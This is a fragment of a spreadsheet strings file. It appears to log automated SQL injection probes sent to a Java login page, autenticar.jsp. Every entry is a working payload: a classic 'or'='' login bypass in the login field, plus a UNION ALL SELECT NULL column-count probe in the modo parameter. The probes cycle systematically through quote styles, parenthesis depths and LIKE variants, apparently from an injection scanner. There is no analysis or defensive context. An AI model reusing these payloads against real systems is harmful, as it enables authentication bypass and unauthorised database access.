    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselect3656,3656,3656,3656,3656,3656,3656,3656,3656,3656,3656,3656,3656,3656,3656,3656,3656,3656,3656,3656#and"ywqr"like"ywqr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselect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#and(8591=8591</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(9984=9984</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(1047=1047</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(6845=6845</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(5656=5656</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(7530=7530</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(3372=3372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#and(710=710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#and(1789=1789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#and(9427=9427</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((1535=1535</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((9848=9848</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((3575=3575</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((1345=1345</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((5889=5889</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((493=493</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((8020=8020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#and((4243=4243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#and((5306=5306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#and((3482=3482</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((7960=7960</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((9339=9339</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((7115=7115</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((8998=8998</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((3658=3658</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((6258=6258</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(((5620=5620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#and(((6908=6908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#and(((1213=1213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#and(((2541=2541</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect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#and('kjbv'='kjbv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('ejty'='ejty</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('rnyt'='rnyt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('prvk'='prvk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('egar'='egar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('udws'='udws</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('okyb'='okyb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#and('hcke'='hcke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#and('blpj'='blpj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#and('hews'='hews</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('evmr'='evmr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('oadr'='oadr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('lqrl'='lqrl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('jpsa'='jpsa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('evjv'='evjv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('ebui'='ebui</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('eeku'='eeku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#and(('hunr'='hunr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#and(('jsdq'='jsdq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#and(('maqv'='maqv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('ibmn'='ibmn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('hlvz'='hlvz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('rspr'='rspr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('pvqc'='pvqc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('fybk'='fybk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('tyvh'='tyvh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('nodx'='nodx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#and((('loks'='loks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#and((('uajr'='uajr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#and((('duvi'='duvi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'gqup'='gqup</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'ehfa'='ehfa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'csvt'='csvt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'blkw'='blkw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'pqom'='pqom</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'cinj'='cinj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'elnz'='elnz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#and'didb'='didb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#and'bmjt'='bmjt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#and'zhah'='zhah</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('xkic'like'xkic</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('ywgr'like'ywgr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('jhdx'like'jhdx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('umxu'like'umxu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('elzv'like'elzv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('srvg'like'srvg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('kkyk'like'kkyk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#and('gdtp'like'gdtp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#and('ulfr'like'ulfr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#and('fpxm'like'fpxm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('tnjr'like'tnjr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('rgvi'like'rgvi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('axco'like'axco</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('nusa'like'nusa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('jduc'like'jduc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('eqaq'like'eqaq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('toat'like'toat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#and(('sieu'like'sieu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#and(('mqlg'like'mqlg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#and(('bvaf'like'bvaf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('qdaj'like'qdaj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('obtg'like'obtg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('jjor'like'jjor</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('eomg'like'eomg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('zcmk'like'zcmk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('gkld'like'gkld</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('whky'like'whky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#and((('rqjp'like'rqjp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#and((('visy'like'visy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#and((('zdyj'like'zdyj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'zoyp'like'zoyp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'hugr'like'hugr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'yqsy'like'yqsy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'gnbk'like'gnbk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'xjdh'like'xjdh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'sojd'like'sojd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'otbl'like'otbl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#and'lluw'like'lluw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#and'jjav'like'jjav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#and'wlui'like'wlui</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("riqu"="riqu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("dtau"="dtau</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("oxbk"="oxbk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("rbdl"="rbdl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("xlpx"="xlpx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("ersc"="ersc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("opbq"="opbq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#and("cnin"="cnin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#and("azhg"="azhg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#and("whvi"="whvi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("vkap"="vkap</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("vxpr"="vxpr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("ueml"="ueml</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("ztru"="ztru</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("hocp"="hocp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("yoqv"="yoqv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("qiay"="qiay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#and(("hats"="hats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#and(("uwzo"="uwzo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#and(("sqik"="sqik</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("taji"="taji</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("rnzq"="rnzq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("bfjd"="bfjd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("dmgc"="dmgc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("uies"="uies</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("kchz"="kchz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("qswr"="qswr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#and((("qimr"="qimr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#and((("oapi"="oapi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#and((("ckeq"="ckeq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"dhfz"="dhfz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"fmcz"="fmcz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"xuto"="xuto</t>
  </si>
  <si>
